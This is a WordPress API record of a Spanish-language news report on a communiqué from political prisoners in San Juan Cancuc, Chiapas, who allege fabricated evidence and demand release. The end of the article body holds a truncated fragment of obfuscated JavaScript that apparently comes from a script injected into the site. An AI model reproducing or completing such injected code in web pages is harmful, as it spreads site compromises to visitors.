{"id":16786,"date":"2024-07-18T01:07:59","date_gmt":"2024-07-18T01:07:59","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16786"},"modified":"2024-07-18T01:07:59","modified_gmt":"2024-07-18T01:07:59","slug":"presos-politicos-denuncian-injusticias-y-exigen-libertad-inmediata","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16786","title":{"rendered":"Presos pol\u00edticos denuncian injusticias y exigen libertad inmediata"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/WhatsApp-Image-2024-07-17-at-6.21.32-PM-1-768x1024.jpeg\" alt=\"\" class=\"wp-image-16787\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/WhatsApp-Image-2024-07-17-at-6.21.32-PM-1-768x1024.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/WhatsApp-Image-2024-07-17-at-6.21.32-PM-1-225x300.jpeg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/WhatsApp-Image-2024-07-17-at-6.21.32-PM-1-1152x1536.jpeg 1152w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/WhatsApp-Image-2024-07-17-at-6.21.32-PM-1.jpeg 1200w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>17 de julio del 2024. San Crist\u00f3bal de Las Casas &#8211; El Grupo de Trabajo No Estamos Todas No Estamos Todos difundieron el comunicado de los presos pol\u00edticos de San Juan Cancuc, quienes afirman que no cesar\u00e1n en su lucha por la libertad. Los detenidos, Agust\u00edn P\u00e9rez Dom\u00ednguez, Agust\u00edn P\u00e9rez Velasco, Mart\u00edn P\u00e9rez Dom\u00ednguez y Juan Velasco Aguilar, denuncian que llevan 2 a\u00f1os y 2 meses encarcelados por un delito que no cometieron.<\/p>\n\n\n\n<p>Seg\u00fan el comunicado, los presos aseguran que la Fiscal\u00eda de Justicia Ind\u00edgena fabric\u00f3 todas las pruebas presentadas en su contra, las cuales fueron valoradas por la jueza de enjuiciamiento, resultando en una sentencia de 25 a\u00f1os de prisi\u00f3n. Los detenidos sostienen que esta situaci\u00f3n es un ejemplo m\u00e1s de las injusticias que enfrentan muchas personas encarceladas.<\/p>\n\n\n\n<p>Los presos de San Juan Canc\u00fac hicieron un llamado a sus compa\u00f1eros y compa\u00f1eras que los acompa\u00f1an en la lucha para exigir su libertad inmediata. &#8220;No nos desanimamos, seguimos en la lucha, porque sabemos que aqu\u00ed dentro de la c\u00e1rcel la mayor\u00eda son inocentes y lo est\u00e1n pagando injustamente&#8221;.<\/p>\n\n\n\n<p>Adem\u00e1s, los detenidos exigieron a la Fiscal\u00eda que deje de fabricar delitos y de detener a personas inocentes, resaltando la necesidad de una justicia verdadera y sin corrupci\u00f3n. &#8220;Ya basta de fabricar delitos a la fiscal\u00eda. Ya basta de detener a gente inocentes&#8221;.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 17 de julio del 2024. San Crist\u00f3bal de Las Casas &#8211; El Grupo de Trabajo No Estamos Todas No Estamos Todos difundieron el comunicado de los presos pol\u00edticos de San Juan Cancuc, quienes afirman que no cesar\u00e1n en su lucha por la libertad. Los detenidos, Agust\u00edn P\u00e9rez Dom\u00ednguez, Agust\u00edn P\u00e9rez Velasco, Mart\u00edn &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16787,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-16786","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-sin-categoria"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16786","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16786"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16786\/revisions"}],"predecessor-version":[{"id":16788,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16786\/revisions\/16788"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16787"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16786"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16786"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16786"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}